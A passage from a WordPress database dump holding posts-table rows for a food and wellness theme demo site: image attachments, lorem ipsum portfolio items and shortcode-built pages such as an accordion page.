10:57:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product7-gallery1.jpg',0,'attachment','image/jpeg',0),(1188,1,'2018-01-29 10:57:14','2018-01-29 10:57:14','','product7-gallery2','','inherit','open','closed','','product7-gallery2','','','2018-01-29 10:57:14','2018-01-29 10:57:14','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product7-gallery2.jpg',0,'attachment','image/jpeg',0),(1190,1,'2018-01-29 10:57:16','2018-01-29 10:57:16','','product7-gallery3','','inherit','open','closed','','product7-gallery3','','','2018-01-29 10:57:16','2018-01-29 10:57:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product7-gallery3.jpg',0,'attachment','image/jpeg',0),(1194,1,'2018-01-29 10:59:15','2018-01-29 10:59:15','','product8-gallery1','','inherit','open','closed','','product8-gallery1','','','2018-01-29 10:59:15','2018-01-29 10:59:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product8-gallery1.jpg',0,'attachment','image/jpeg',0),(1195,1,'2018-01-29 10:59:17','2018-01-29 10:59:17','','product8-gallery2','','inherit','open','closed','','product8-gallery2','','','2018-01-29 10:59:17','2018-01-29 10:59:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product8-gallery2-1.jpg',0,'attachment','image/jpeg',0),(1196,1,'2018-01-29 10:59:19','2018-01-29 10:59:19','','product8-gallery3','','inherit','open','closed','','product8-gallery3','','','2018-01-29 10:59:19','2018-01-29 10:59:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product8-gallery3.jpg',0,'attachment','image/jpeg',0),(1203,1,'2018-01-29 11:07:41','2018-01-29 11:07:41','','h9-img-6','','inherit','open','closed','','h9-img-6','','','2018-01-29 11:07:41','2018-01-29 11:07:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-6.jpg',0,'attachment','image/jpeg',0),(1204,1,'2018-01-29 11:07:43','2018-01-29 11:07:43','','h9-img-8','','inherit','open','closed','','h9-img-8','','','2018-01-29 11:07:43','2018-01-29 11:07:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-8.jpg',0,'attachment','image/jpeg',0),(1211,1,'2018-01-29 12:02:33','2018-01-29 12:02:33','','h9-img-3','','inherit','open','closed','','h9-img-3','','','2018-01-29 12:02:33','2018-01-29 12:02:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-3.jpg',0,'attachment','image/jpeg',0),(1216,1,'2018-01-29 12:06:18','2018-01-29 12:06:18','','h9-img-9','','inherit','open','closed','','h9-img-9','','','2018-01-29 12:06:18','2018-01-29 12:06:18','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-9.jpg',0,'attachment','image/jpeg',0),(1277,1,'2018-01-29 14:49:05','2018-01-29 14:49:05','','h9-img-4','','inherit','open','closed','','h9-img-4','','','2018-01-29 14:49:05','2018-01-29 14:49:05','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-4.jpg',0,'attachment','image/jpeg',0),(1283,1,'2018-01-29 15:08:15','2018-01-29 15:08:15','','h9-img-5','','inherit','open','closed','','h9-img-5','','','2018-01-29 15:08:15','2018-01-29 15:08:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-5.jpg',0,'attachment','image/jpeg',0),(1295,1,'2018-01-29 15:33:20','2018-01-29 15:33:20','','product13-gallery1','','inherit','open','closed','','product13-gallery1','','','2018-01-29 15:33:20','2018-01-29 15:33:20','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product13-gallery1.jpg',0,'attachment','image/jpeg',0),(1296,1,'2018-01-29 15:33:23','2018-01-29 15:33:23','','product13-gallery2','','inherit','open','closed','','product13-gallery2','','','2018-01-29 15:33:23','2018-01-29 15:33:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product13-gallery2.jpg',0,'attachment','image/jpeg',0),(1297,1,'2018-01-29 15:33:25','2018-01-29 15:33:25','','product13-gallery3','','inherit','open','closed','','product13-gallery3','','','2018-01-29 15:33:25','2018-01-29 15:33:25','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product13-gallery3.jpg',0,'attachment','image/jpeg',0),(1299,1,'2018-01-29 15:34:25','2018-01-29 15:34:25','','product14-gallery1','','inherit','open','closed','','product14-gallery1','','','2018-01-29 15:34:25','2018-01-29 15:34:25','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product14-gallery1.jpg',0,'attachment','image/jpeg',0),(1300,1,'2018-01-29 15:34:27','2018-01-29 15:34:27','','product14-gallery2','','inherit','open','closed','','product14-gallery2','','','2018-01-29 15:34:27','2018-01-29 15:34:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product14-gallery2.jpg',0,'attachment','image/jpeg',0),(1301,1,'2018-01-29 15:34:29','2018-01-29 15:34:29','','product14-gallery3','','inherit','open','closed','','product14-gallery3','','','2018-01-29 15:34:29','2018-01-29 15:34:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product14-gallery3.jpg',0,'attachment','image/jpeg',0),(1336,1,'2018-01-30 08:26:05','2018-01-30 08:26:05','','Elements','','publish','closed','closed','','elements','','','2018-01-30 08:26:05','2018-01-30 08:26:05','',0,'http://succulents.select-themes.com/?page_id=1336',0,'page','',0),(1338,1,'2018-01-30 08:26:41','2018-01-30 08:26:41','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521026420279{padding-top: 100px !important;}\"][vc_column offset=\"vc_col-lg-6\"][qodef_accordion][qodef_accordion_tab title=\"Organic Food\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Vegan Recepies\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Veggie Meals\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Top Chef\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Energy Smoothies\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][/qodef_accordion][/vc_column][vc_column offset=\"vc_col-lg-6\"][qodef_accordion][qodef_accordion_tab title=\"Organic Food\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Vegan Recepies\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Veggie Meals\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Top Chef\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Energy Smoothies\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque molestie convallis est, vel aliquet sapien rutrum ac. Pellentesque varius et libero non bibendum. Mauris ultrices, quam id aliquam auctor, tellus quam.[/vc_column_text][/qodef_accordion_tab][/qodef_accordion][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1521026432731{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][qodef_accordion style=\"toggle\"][qodef_accordion_tab title=\"Organic Food\"][vc_column_text]Cras quis massa non leo pellentesque mollis pretium non eros. Sed sapien libero, posuere non elit et, porta placerat mauris. Donec orci urna, ornare a varius et, tempus nec eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam vehicula nisl vel arcu maximus ultrices. Ut vitae neque non augue feugiat dictum. Nulla sollicitudin tellus odio, nec porta lectus molestie quis. Nulla facilisi. Ut venenatis, erat eu molestie sagittis.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Vegan Recepies\"][vc_column_text]Cras quis massa non leo pellentesque mollis pretium non eros. Sed sapien libero, posuere non elit et, porta placerat mauris. Donec orci urna, ornare a varius et, tempus nec eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam vehicula nisl vel arcu maximus ultrices. Ut vitae neque non augue feugiat dictum. Nulla sollicitudin tellus odio, nec porta lectus molestie quis. Nulla facilisi. Ut venenatis, erat eu molestie sagittis.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Veggie Meals\"][vc_column_text]Cras quis massa non leo pellentesque mollis pretium non eros. Sed sapien libero, posuere non elit et, porta placerat mauris. Donec orci urna, ornare a varius et, tempus nec eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam vehicula nisl vel arcu maximus ultrices. Ut vitae neque non augue feugiat dictum. Nulla sollicitudin tellus odio, nec porta lectus molestie quis. Nulla facilisi. Ut venenatis, erat eu molestie sagittis.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Top Chef\"][vc_column_text]Cras quis massa non leo pellentesque mollis pretium non eros. Sed sapien libero, posuere non elit et, porta placerat mauris. Donec orci urna, ornare a varius et, tempus nec eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam vehicula nisl vel arcu maximus ultrices. Ut vitae neque non augue feugiat dictum. Nulla sollicitudin tellus odio, nec porta lectus molestie quis. Nulla facilisi. Ut venenatis, erat eu molestie sagittis.[/vc_column_text][/qodef_accordion_tab][qodef_accordion_tab title=\"Energy Smothies\"][vc_column_text]Cras quis massa non leo pellentesque mollis pretium non eros. Sed sapien libero, posuere non elit et, porta placerat mauris. Donec orci urna, ornare a varius et, tempus nec eros. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam vehicula nisl vel arcu maximus ultrices. Ut vitae neque non augue feugiat dictum. Nulla sollicitudin tellus odio, nec porta lectus molestie quis. Nulla facilisi. Ut venenatis, erat eu molestie sagittis.[/vc_column_text][/qodef_accordion_tab][/qodef_accordion][/vc_column][/vc_row]','Accordion','','publish','closed','closed','','accordion','','','2018-01-30 08:26:41','2018-01-30 08:26:41','',1336,'http://succulents.select-themes.com/?page_id=1338',0,'page','',0),(1433,1,'2018-01-30 13:09:01','2018-01-30 13:09:01','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Inspiration','','publish','open','closed','','inspiration','','','2018-01-30 13:09:01','2018-01-30 13:09:01','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1433',0,'portfolio-item','',0),(1434,1,'2018-01-30 13:22:17','2018-01-30 13:22:17','','full-width-img-1','','inherit','open','closed','','full-width-img-1','','','2018-01-30 13:22:17','2018-01-30 13:22:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/full-width-img-1.jpg',0,'attachment','image/jpeg',0),(1435,1,'2018-01-30 13:22:20','2018-01-30 13:22:20','','full-width-img-2','','inherit','open','closed','','full-width-img-2','','','2018-01-30 13:22:20','2018-01-30 13:22:20','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/full-width-img-2.jpg',0,'attachment','image/jpeg',0),(1437,1,'2018-01-30 13:27:58','2018-01-30 13:27:58','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Softness','','publish','open','closed','','softness','','','2018-01-30 13:27:58','2018-01-30 13:27:58','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1437',0,'portfolio-item','',0),(1438,1,'2018-01-30 13:36:09','2018-01-30 13:36:09','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Calm','','publish','open','closed','','calm','','','2018-01-30 13:36:09','2018-01-30 13:36:09','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1438',0,'portfolio-item','',0),(1440,1,'2018-01-30 13:37:45','2018-01-30 13:37:45','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Tasty','','publish','open','closed','','tasty','','','2018-01-30 13:37:45','2018-01-30 13:37:45','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1440',0,'portfolio-item','',0),(1442,1,'2018-01-30 13:39:56','2018-01-30 13:39:56','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Fulfillment','','publish','open','closed','','fulfillment','','','2018-01-30 13:39:56','2018-01-30 13:39:56','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1442',0,'portfolio-item','',0),(1444,1,'2018-01-30 13:42:21','2018-01-30 13:42:21','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Forgiveness','','publish','open','closed','','forgiveness','','','2018-01-30 13:42:21','2018-01-30 13:42:21','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1444',0,'portfolio-item','',0),(1445,1,'2018-01-30 13:45:04','2018-01-30 13:45:04','','full-width-img-3','','inherit','open','closed','','full-width-img-3','','','2018-01-30 13:45:04','2018-01-30 13:45:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/full-width-img-3.jpg',0,'attachment','image/jpeg',0),(1456,1,'2018-01-30 13:50:20','2018-01-30 13:50:20','','big-gallery-img-1','','inherit','open','closed','','big-gallery-img-1','','','2018-01-30 13:50:20','2018-01-30 13:50:20','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/big-gallery-img-1.jpg',0,'attachment','image/jpeg',0),(1457,1,'2018-01-30 13:50:23','2018-01-30 13:50:23','','big-gallery-img-2','','inherit','open','closed','','big-gallery-img-2','','','2018-01-30 13:50:23','2018-01-30 13:50:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/big-gallery-img-2.jpg',0,'attachment','image/jpeg',0),(1458,1,'2018-01-30 13:50:26','2018-01-30 13:50:26','','big-gallery-img-3','','inherit','open','closed','','big-gallery-img-3','','','2018-01-30 13:50:26','2018-01-30 13:50:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/big-gallery-img-3.jpg',0,'attachment','image/jpeg',0),(1459,1,'2018-01-30 13:57:44','2018-01-30 13:57:44','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omi.[/vc_column_text][/vc_column][/vc_row]','Organic','','publish','open','closed','','organic','','','2018-01-30 13:57:44','2018-01-30 13:57:44','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1459',0,'portfolio-item','',0),(1463,1,'2018-01-30 14:06:58','2018-01-30 14:06:58','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omi.[/vc_column_text][/vc_column][/vc_row]','Vegan','','publish','open','closed','','vegan','','','2018-01-30 14:06:58','2018-01-30 14:06:58','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1463',0,'portfolio-item','',0),(1468,1,'2018-01-30 14:17:18','2018-01-30 14:17:18','','portfolio-masonry-img-1','','inherit','open','closed','','portfolio-masonry-img-1','','','2018-01-30 14:17:18','2018-01-30 14:17:18','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/portfolio-masonry-img-1.jpg',0,'attachment','image/jpeg',0),(1471,1,'2018-01-30 14:47:30','2018-01-30 14:47:30','','h8-slide2-background','','inherit','open','closed','','h8-slide2-background','','','2018-01-30 14:47:30','2018-01-30 14:47:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-slide2-background.jpg',0,'attachment','image/jpeg',0),(1472,1,'2018-01-30 14:48:16','2018-01-30 14:48:16','','h8-slide3-backgroun','','inherit','open','closed','','h8-slide3-backgroun','','','2018-01-30 14:48:16','2018-01-30 14:48:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-slide3-backgroun.jpg',0,'attachment','image/jpeg',0),(1473,1,'2018-01-30 14:48:21','2018-01-30 14:48:21','','portfolio-masonry-img-2','','inherit','open','closed','','portfolio-masonry-img-2','','','2018-01-30 14:48:21','2018-01-30 14:48:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/portfolio-masonry-img-2.jpg',0,'attachment','image/jpeg',0),(1474,1,'2018-01-30 14:52:16','2018-01-30 14:52:16','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omi.[/vc_column_text][/vc_column][/vc_row]','Fruity','','publish','open','closed','','fruity','','','2018-01-30 14:52:16','2018-01-30 14:52:16','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1474',0,'portfolio-item','',0),(1492,1,'2018-01-30 15:30:19','2018-01-30 15:30:19','','h8-background-img-11','','inherit','open','closed','','h8-background-img-11','','','2018-01-30 15:30:19','2018-01-30 15:30:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-background-img-11.jpg',0,'attachment','image/jpeg',0),(1496,1,'2018-01-30 15:55:28','2018-01-30 15:55:28','','h8-img-5','','inherit','open','closed','','h8-img-5','','','2018-01-30 15:55:28','2018-01-30 15:55:28','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-img-5.png',0,'attachment','image/png',0),(1497,1,'2018-01-30 15:55:30','2018-01-30 15:55:30','','h8-img-6','','inherit','open','closed','','h8-img-6','','','2018-01-30 15:55:30','2018-01-30 15:55:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-img-6.png',0,'attachment','image/png',0),(1498,1,'2018-01-30 15:55:31','2018-01-30 15:55:31','','h8-img-7','','inherit','open','closed','','h8-img-7','','','2018-01-30 15:55:31','2018-01-30 15:55:31','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-img-7.png',0,'attachment','image/png',0),(1504,1,'2018-01-31 08:06:30','2018-01-31 08:06:30','[vc_row content_text_aligment=\"center\" css=\".vc_custom_1520584797330{padding-bottom: 65px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"2027\" image_size=\"full\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][qodef_portfolio_list type=\"masonry\" number_of_columns=\"3\" space_between_items=\"small\" number_of_items=\"18\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" enable_category=\"no\" enable_article_animation=\"yes\" category=\"yoga\"][/vc_column][/vc_row][vc_row simple_background_color=\"#ffffff\" css=\".vc_custom_1518171466628{padding-top: 36px !important;padding-bottom: 100px !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\" css=\".vc_custom_1517402697931{background-color: #fcfcfc !important;}\"][vc_column_inner offset=\"vc_col-lg-offset-0 vc_col-lg-5 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0\"][qodef_single_image enable_image_shadow=\"no\" image=\"1633\" image_size=\"full\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-offset-0 vc_col-lg-7 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"48px 135px 0px 0px\" item_padding_1280_1600=\"48px 135px 0px 0px\" item_padding_1024_1280=\"48px 135px 0px 0px\" item_padding_768_1024=\"48px 178px 92px 71px\" item_padding_680_768=\"48px 70px 109px 62px\" item_padding_680=\"36px 33px 84px 33px\"][qodef_single_image enable_image_shadow=\"no\" image=\"1631\"][vc_column_text]It is a long established fact that a rea der will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content[/vc_column_text][vc_empty_space height=\"25px\"][qodef_button text=\"my story\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://succulents.select-themes.com/about-us/\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Portfolio Pinterest','','publish','closed','closed','','portfolio-pinterest','','','2018-01-31 08:06:30','2018-01-31 08:06:30','',0,'http://succulents.select-themes.com/?page_id=1504',0,'page','',0),(1520,1,'2018-01-31 08:57:53','2018-01-31 08:57:53','','h7-img-1','','inherit','open','closed','','h7-img-1','','','2018-01-31 08:57:53','2018-01-31 08:57:53','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h7-img-1.jpg',0,'attachment','image/jpeg',0),(1525,1,'2018-01-31 09:01:44','2018-01-31 09:01:44','','h7-img-2','','inherit','open','closed','','h7-img-2','','','2018-01-31 09:01:44','2018-01-31 09:01:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h7-img-2.jpg',0,'attachment','image/jpeg',0),(1536,1,'2018-01-31 10:04:10','2018-01-31 10:04:10','','h7-img-3','','inherit','open','closed','','h7-img-3','','','2018-01-31 10:04:10','2018-01-31 10:04:10','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h7-img-3.jpg',0,'attachment','image/jpeg',0),(1538,1,'2018-01-31 10:07:58','2018-01-31 10:07:58','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Diet','','publish','open','closed','','diet','','','2018-01-31 10:07:58','2018-01-31 10:07:58','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1538',0,'portfolio-item','',0),(1539,1,'2018-01-31 10:08:11','2018-01-31 10:08:11','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Mindful','','publish','open','closed','','mindful','','','2018-01-31 10:08:11','2018-01-31 10:08:11','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1539',0,'portfolio-item','',0),(1540,1,'2018-01-31 10:08:30','2018-01-31 10:08:30','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Opposite','','publish','open','closed','','opposite','','','2018-01-31 10:08:30','2018-01-31 10:08:30','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1540',0,'portfolio-item','',0),(1541,1,'2018-01-31 10:08:49','2018-01-31 10:08:49','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Fantastic','','publish','open','closed','','fantastic','','','2018-01-31 10:08:49','2018-01-31 10:08:49','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1541',0,'portfolio-item','',0),(1542,1,'2018-01-31 10:08:53','2018-01-31 10:08:53','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Freemind','','publish','open','closed','','freemind','','','2018-01-31 10:08:53','2018-01-31 10:08:53','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1542',0,'portfolio-item','',0),(1543,1,'2018-01-31 10:08:57','2018-01-31 10:08:57','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Different','','publish','open','closed','','different','','','2018-01-31 10:08:57','2018-01-31 10:08:57','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1543',0,'portfolio-item','',0),(1544,1,'2018-01-31 10:09:00','2018-01-31 10:09:00','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omi.[/vc_column_text][/vc_column][/vc_row]','Possibility','','publish','open','closed','','possibility','','','2018-01-31 10:09:00','2018-01-31 10:09:00','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1544',0,'portfolio-item','',0),(1545,1,'2018-01-31 10:09:04','2018-01-31 10:09:04','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omi.[/vc_column_text][/vc_column][/vc_row]','Variations','','publish','open','closed','','variations','','','2018-01-31 10:09:04','2018-01-31 10:09:04','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1545',0,'portfolio-item','',0),(1546,1,'2018-01-31 10:09:08','2018-01-31 10:09:08','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omi.[/vc_column_text][/vc_column][/vc_row]','Cosmetics','','publish','open','closed','','cosmetics','','','2018-01-31 10:09:08','2018-01-31 10:09:08','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=1546',0,'portfolio-item','',0),(1547,1,'2018-01-31 10:14:04','2018-01-31 10:14:04','','h7-img-4','','inherit','open','closed','','h7-img-4','','','2018-01-31 10:14:04','2018-01-31 10:14:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h7-img-4.jpg',0,'attachment','image/jpeg',0),(1548,1,'2018-01-31 10:14:58','2018-01-31 10:14:58','','h7-img-5','','inherit','open','closed','','h7-img-5','','','2018-01-31 10:14:58','2018-01-31 